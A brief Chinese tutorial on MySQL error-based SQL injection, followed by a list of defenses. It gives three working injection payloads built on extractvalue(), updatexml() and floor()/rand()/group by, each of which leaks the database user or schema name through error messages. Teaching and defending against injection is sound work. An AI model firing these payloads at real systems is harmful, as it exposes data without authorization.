常见的报错注入原理

常用的报错注入函数（MySQL）

1. extractvalue()用于从 XML 字符串中提取值，当参数不符合 XML 格式时会报错，可用于泄露信息：
   sql

   and extractvalue(1,concat(0x7e,(select user()),0x7e))
   

    
    
2. updatexml()用于更新 XML 文档，参数错误时会报错：
   sql

   and updatexml(1,concat(0x7e,(select database()),0x7e),1)
   

    
    
3. floor() + rand() + group by利用 MySQL 分组统计时的特性触发错误：
   sql

   and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)
   

    
    

防范措施

1. 严格过滤用户输入：对所有用户输入进行合法性校验，过滤特殊字符和 SQL 关键字。
2. 使用参数化查询：采用预编译语句（如 PDO、PreparedStatement），避免直接拼接 SQL 字符串。
3. 关闭错误信息暴露：在生产环境中禁用数据库错误信息直接返回给用户，改为自定义错误提示。
4. 限制数据库用户权限：应用程序连接数据库的账号应仅授予必要权限，避免使用 root 等高权限账号。
5. 定期安全审计：检查应用程序代码中可能存在的注入漏洞，及时修复。